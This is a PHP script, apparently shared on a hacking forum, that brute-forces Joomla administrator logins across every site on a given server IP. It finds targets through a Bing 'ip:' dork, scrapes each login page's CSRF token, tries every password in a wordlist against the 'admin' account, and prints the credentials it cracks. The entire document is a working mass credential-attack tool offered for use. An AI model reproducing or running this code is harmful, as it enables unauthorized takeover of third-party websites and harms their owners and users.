brut force j00mla in all server

1. <?
2.  
3. /*
4. @hamza killer
5. to: b0x-HawQal Dz - black-id - Top Gastro<3 - Ji Nx - linuxdz
6. exploit4arab.net
7. sec4all.org/cc/
8. sec4ever.com
9.  */
10. ini_set('memory_limit', '640M');
11. set_time_limit(0);
12. echo"
13. [+]==================================[+]
14. [+]   JOmla Brut force All server    [+]
15. [+]          hamza killer            [+]
16. [+]          Made in Dz              [+]
17. [+]==================================[+]
18. ";
19. echo"
20. [I.Pservers][===>]";
21. $ip=trim(fgets(STDIN,1024));
22. echo"
23. [+] passw0rd list =>";
24. $file=trim(fgets(STDIN,1024));
25. $ex=@explode("\n",@file_get_contents($file));
26. if(!$ex){
27.     echo"
28. [-] file not Found";
29. exit();
30. }
31. $c=count($ex);
32. echo"
33. [+] loaded $c pass";
34.  
35. /*
36. this function by g-b
37. */
38. $dork = urlencode("ip:$ip index.php?option=com_");
39. $pages = pages($dork);
40. $scanaed = array();
41. for($i=1;$i<=$pages;$i=$i+10){
42.     $src = file_get_contents("http://www.bing.com/search?q=$dork&first=$i");
43.     preg_match_all('/<cite>(.*?)<strong>/',$src,$matches);
44.     $sites = $matches[1];
45.     foreach($sites as $site){
46.  
47.  foreach($ex as $pass){
48.  
49. /*
50. This code by g-b ==>
51. */
52.   $sitet = trim(str_replace('www.','',str_replace('/','',$site)));
53. if(eregi('<',$sitet) || eregi('\?',$sitet)) continue;
54. if(in_array($sitet,$scanaed)) continue;
55. $scanaed[] = $sitet;
56. /*
57. code by g-b fincih <===
58. tnx to g-b ^_^
59. */
60. $d=token($site);
61. $f=login($site,$pass,$d);
62.  if($f){
63.    echo"
64. \n
65. [+] Craced \n
66. [+] http://$site/administrator/index.php : admin : $pass\n";
67.  }
68. }} }
69.  
70. function token($url)
71.         {       $vurl='http://'.$url."/administrator/index.php";
72.                 $sh = curl_init();
73.                 curl_setopt($sh,CURLOPT_RETURNTRANSFER,1);
74.                 curl_setopt($sh,CURLOPT_FOLLOWLOCATION,1);
75.                 curl_setopt($sh,CURLOPT_URL, $vurl);
76.                 $exe = curl_exec($sh);
77.                 preg_match('/<input type="hidden" name="(.*?)" value="1"/', $exe,$token);
78.                 return $token[1];
79.         }
80.           function login($url,$password,$token)
81.         {       $urlv='http://'.$url.'/administrator/index.php';
82.                 $sh = curl_init();
83.                 curl_setopt($sh,CURLOPT_RETURNTRANSFER,1);
84.                 curl_setopt($sh,CURLOPT_FOLLOWLOCATION,1);
85.                 curl_setopt($sh,CURLOPT_URL, $urlv);
86.                 curl_setopt($sh,CURLOPT_POSTFIELDS,"username=admin&passwd=$password&lang=&option=com_login&task=login&return=aW5kZXgucGhw&{$token}=1");
87.                 $brute = curl_exec($sh);
88.                 if(eregi("Logout" , $brute))
89.                 {
90.                   return true;
91.                 }else{
92.                return false;
93.  
94.                 }
95.         }
96. function pages($dork){
97.     $sourc = file_get_contents("http://www.bing.com/search?q=$dork&go=&qs=n&sk=&filt=all&first=199&FORM=PERE3");
98.     $exop= explode('<span class="sb_count" id="count">',$sourc);
99.     $exop = explode('-',$exop['1']);
100.     return $exop[0];
101. }
102. ?>